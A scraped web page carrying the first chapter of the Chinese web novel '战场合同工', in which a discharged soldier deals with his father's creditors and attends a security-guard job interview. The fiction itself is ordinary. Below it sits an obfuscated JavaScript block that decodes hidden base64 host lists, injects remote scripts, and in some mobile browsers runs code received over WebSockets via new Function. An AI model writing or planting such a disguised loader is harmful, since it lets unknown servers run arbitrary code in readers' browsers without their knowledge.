笔趣阁

字:
关灯 护眼
笔趣阁 > 战场合同工 > 第一章 退伍兵

第一章 退伍兵

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
    闹钟响了。林锐很快的从床上坐了起来,几乎是条件反射般地穿起了衣服。然后以最快的速度把自己的被子叠成了豆腐块。做完这一切他才突然意识到,自己完全不需要这么早起床。不需要再在把床上的被子叠成方方正正的豆腐块。

    因为,他已经退伍了。而他每天,总是在做完这一切之后才意识到这一点。

    是的,自己已经回来了。回到了自己分别几年的城市,他在这里出生,在这里求学,在这里遇到了自己最初喜欢的女孩。让现在这一切都显得有些陌生了。尽管,他才离开两年。

    林锐摇了摇头,像是要把纷乱的思绪从自己的脑中甩开。

    他已经够烦了。母亲过世的早,父亲也因为意外,在去年离世。留给他的是一堆没有偿还的债务,和年迈的祖父。而他刚刚从部队退伍回家。

    该出去找工作了。林锐叹了一口气,从衣柜里翻出自己的旧西装,套在身上,却总是觉得的敞开的领口没有风纪扣,感觉不太自在。

    他收拾好了之后推门而出,迎面而来的几个熟人却让他微微愣了一下。“张叔叔,你们这是……”

    “小锐,本来你刚回来,这点事情我也不好意思来找你。不过,你父亲的这些借条。”张叔叔脸上的表情一些尴尬。他毕竟是林锐父亲的朋友。

    而其他人却没有这么客气了,开口直接就是诉苦,有意无意地表示自己家经济拮据,间接的意思也就是让林瑞尽早还钱。

    林锐沉默了一下,点了点头,“我明白,你们的来意我都知道了,不过现在我确实还不出钱。即便你们堵在门口不让我出去,我也还是没有钱还给你们。不如你们让我出去找工作,只要有了工作,你们的钱我会想办法慢慢的还。我现在唯一值点钱的也只有这套房子了,即便是卖了,也不值多少,而且我们住哪里?”

    门口的几个人都安静了下来,虽然有些不太情愿,但还是让林锐走了出去。林家现在的情况他们都知道。

    “谢谢!”林锐点点头道。

    没有人会喜欢债主,但是林锐也并不讨厌他们。他们只是一些普通人,想要回原本属于自己的东西,仅此而已。更何况他们很多人还是父亲的朋友。在父亲生意失败的时候,是他们帮助了林家。林锐知道自己欠他们的并不只是钱,还有人情。

    但无论是谁?大早上的碰到这样的事情,总是不会太舒服。林锐整理了一下衣服,努力调整自己心态。今天要去面试,他并不想带着不好的情绪。深呼吸了一口清晨带着寒意的空气,努力微笑着,走出了这条小巷。

    他要去面试的是一家保安公司。当一个保安,虽然听起来也并不算是什么好工作。但是找工作也不是一件很容易的事,他投递出去的简历能有回音就已经很不错了,而大部分犹如石沉大海,所以林锐觉得应该去试试,他按照地址找到了那家公司。

    这家公司所在的办公楼里,林锐找到了负责面试他的人。

    似乎没有其他人,看起来应聘的人并不是很多。林锐暗自摇头,不过来都来了,他还是耐着性子走进了办公室。负责面试他的是一个四十多岁,有点发福的中年人。

    “我姓王,你叫我王主任就行了。”中年人翻看了一下桌上的简历,对林锐道,“坐吧,林锐,你的情况我了解了一下,身高和形象方面没有什么问题。应该能够适合我们的工作。不过我还有些细节准备了解一下。你是退伍军人,今年退伍的?”

    “是的。”林锐点点头。

    “我注意到你的服役记录很优秀,受过几次嘉奖。那么你是在什么部队服役的?”王主任随意道。

    林锐犹豫了一下道,“陆军,其他的我的退伍证上都有。”

    王主任看了他一眼,微微一笑道,“只是随便问问,别紧张。我知道部队有保密条令,有些东西不能随便说,那么就说说你有什么特长好了。”

    林锐点点头,“轻武器射击,格斗,侦察测量,单兵渗透和反渗透作战,还懂一点爆破。”

    王主任愣了半天,突然忍不住笑了,“抱歉,是我没有说清楚,我不是说军事特长。你知道这是和平年代,而我们只是一家保安公司,我们没有敌人,最多只有几家同行业的竞争对手。虽说商场如战场,但是我们可不需要你潜入对方公司去搞渗透和爆破活动。我只是想问问,你有没有其他的特长。”

    办公室的其他人也都笑了起来,感觉这个年轻人很有意思。

    “这……”林锐自己也感觉有些不好意思,笑了笑道,“没有了。”

    王主任点点头道,“你在简历上说,你想找一个月薪在三千左右的工作,而且最好是上夜班。这是为什么?”
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x57\x69\x77\x51\x4b\x69\x58\x4b\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNoZGtmamxhcy56aGl4aWFuZ2h1aWJhbby5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《战场合同工》
打开
浏览器
继续